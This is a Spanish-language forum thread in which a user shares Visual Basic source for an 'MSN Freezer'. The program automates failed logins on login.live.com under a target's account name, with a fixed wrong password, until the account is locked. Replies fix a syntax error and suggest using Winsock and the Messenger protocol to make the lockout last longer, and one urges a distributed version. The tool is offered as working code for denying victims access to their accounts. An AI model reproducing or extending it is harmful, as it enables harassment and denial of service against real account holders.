Autor
|
Tema: [SRC] Msn Freezer Compact [by *PsYkE1*] (Leído 11,918 veces)
|
Psyke1
Wiki
|
Hola amigos, os presento este code de un Msn freezer, pero a diferencia de los demas, ahorra mucho codigo y cumple basicamente la misma funcion, generalmente en menos tiempo, no se si esto ya se le habia ocurrido antes a alguien, pero ahi va... Por cierto, las criticas constructivas son bienvenidas!! *Utilizo componente: -Microsoft Internet Controls *En el formulario agrego: -Un Textbox = Text1 -Un CommandButton = Command1 -Un WebBrowser = WB ' //////////////////////////////////////////////////////////////// ' // *Autor: *PsYkE1* (miguelin.majo@gmail.com) // ' // *Podeis agrandar o reducir el codigo, siempre y cuando se // ' // respete la autoria y se me comuniquen esos cambios. // ' // *Agradecimientos a BlackZeroX. // ' // *Visita http://foro.rthacker.net // ' //////////////////////////////////////////////////////////////// Dim Flag As Boolean Private Sub Command1_Click() 'Dependiendo del Caption del botón realiza una u otra acción If Command1.Caption = "Congelar" Then 'Si el Text1 esta vacio If Text1.Text = "" Then Flag = False MsgBox "Debes introducir una cuenta", vbCritical, "*PsYkE1* Msn Freezer v1.0" Else Flag = False Text1.Enabled = False WB.Navigate ("login.live.com") 'Abro la Web para logearse Command1.Caption = "Descongelar" End If Else Text1.Enabled = True Command1.Caption = "Congelar" WB.Navigate ("") 'Salgo de la Web MsgBox "La cuenta " & Text1.Text & " ha sido descongelada", vbInformation, "*PsYkE1* Msn Freezer v1.0" End If End Sub Private Sub Form_Load() Me.Caption = "*PsYkE1* Msn Freezer v1.0" 'Pongo Title al Form Command1.Caption = "Congelar" 'Asigno el Caption al botón Flag = True 'Activo el interruptor End Sub Private Sub WB_DocumentComplete(ByVal pDisp As Object, URL As Variant) On Error Resume Next 'Si hay error no lo muestre If Flag Then Exit Sub 'Si el interuptor está activado salgo With WB .Document.All("login").Value = Text1.Text 'Ingreso la cuenta .Document.All("passwd").Value = "by*PsYkE1*" 'Pongo una contraseña que no es .Document.All("SI").Click 'hago click End With ' Si encuentro la cadena "demasiadas veces" en el documento del WB... If InStr(WB.Document.Body.InnerHtml, "demasiadas veces") Then MsgBox "La cuenta : " & Text1.Text & " ha sido bloqueada con éxito!" _ , vbInformation, "*PsYkE1* Msn Freezer v1.0": Flag = True End If End Sub
Espero que os haya gustado
|
|
« Última modificación: 25 Junio 2010, 12:24 pm por *PsYkE1* »
|
|
|
|
|
L4sk0!
|
E exado un vistazo al code y he de decir q esta bastante bien, no es tan profesional como si utilizas el control winsock, pero he de admitir q le has hechado imaginacion... Lo he compilado y tarda un poco mas de lo que dices, pero insisto en q no esta nada mal, minimalista, me gusta... salu2
|
|
|
|
|
|
|
benchy
|
Hola, lo pase a C#.net porque no entiendo mucho de visual basic y lo estuve probando pero no funciona como los otros Msn Freezer, por lo que veo el evento DocumentComplete se dispara hasta que se bloquea el correo hasta ahi todo bien pero despues de eso no hace nada mas el programa y al rato se desbloquea solo el correo, los otros msn freezer que probe hasta que no cerras el programa no se desbloquea el correo, puede estar dias inclusive, alguien sabe como se programan esos freezer? Saludos
|
|
|
|
|
|
|
Karcrack
Se siente observado ¬¬'
|
Ummm.. Hay un error de sintaxis, no cierras el ultimo IfEn ultimo If es del que yo quiero hablar: If InStr(WB.Document.body.innerhtml, "demasiadas veces") Then
Eso no es en absoluto generico, teniendo en cuenta que entras en login.live.com y es la propia pagina la que determina que idioma te muestra... Deberias comprobarlo de otra forma... no se... tal vez con el HTTP STATUS (404,200...)
|
|
|
|
|
|
|
Psyke1
Wiki
|
Ummm.. Hay un error de sintaxis, no cierras el ultimo IfEn ultimo If es del que yo quiero hablar: If InStr(WB.Document.body.innerhtml, "demasiadas veces") Then
Eso no es en absoluto generico, teniendo en cuenta que entras en login.live.com y es la propia pagina la que determina que idioma te muestra... Deberias comprobarlo de otra forma... no se... tal vez con el HTTP STATUS (404,200...) Si, es verdad, ya esta corregido... Me informare de lo segundo para mejorarlo... Gracias Hola, lo pase a C#.net porque no entiendo mucho de visual basic y lo estuve probando pero no funciona como los otros Msn Freezer, por lo que veo el evento DocumentComplete se dispara hasta que se bloquea el correo hasta ahi todo bien pero despues de eso no hace nada mas el programa y al rato se desbloquea solo el correo, los otros msn freezer que probe hasta que no cerras el programa no se desbloquea el correo, puede estar dias inclusive, alguien sabe como se programan esos freezer? Saludos Investiga sobre el control Winsock y mirate el MSNP(Messenger Protocol), no creo que esta sea la forma idónea de hacerlo, solo busque hacerlo de una forma diferente, y mas sencilla... No sabia que el mio era por tiempo limitado... Lo he testeado horas y creo recordar que funcionaba... Salu2!
|
|
« Última modificación: 14 Junio 2010, 20:20 pm por *PsYkE1* »
|
|
|
|
|
n3fisto
|
Buenisimas tus aplicaciones enserio aunque como dicen winsock y MSNP te verian de maravillas
|
|
|
|
|
|
|
Psyke1
Wiki
|
Solo trato de dar soluciones diferentes! Me alegra que te guste!
Salu2!
|
|
|
|
|
|
|
n3fisto
|
Bueno la verdad si lo tienes muy facil lo haces las cosas yo me complico mucho al programar, como el programa que hice de firmas digitales
|
|
|
|
|
|
|
Debci
Wiki
Actualizate o muere!
|
Pero esto no provocaria un DOS al servidor web? Bueno al menos haria saltar las alarmas no? Ve un paso mas lejos y hazlo para que se pueda hacer de manera distribuida.
^^
Saludos
|
|
|
|
|
|
|
n3fisto
|
|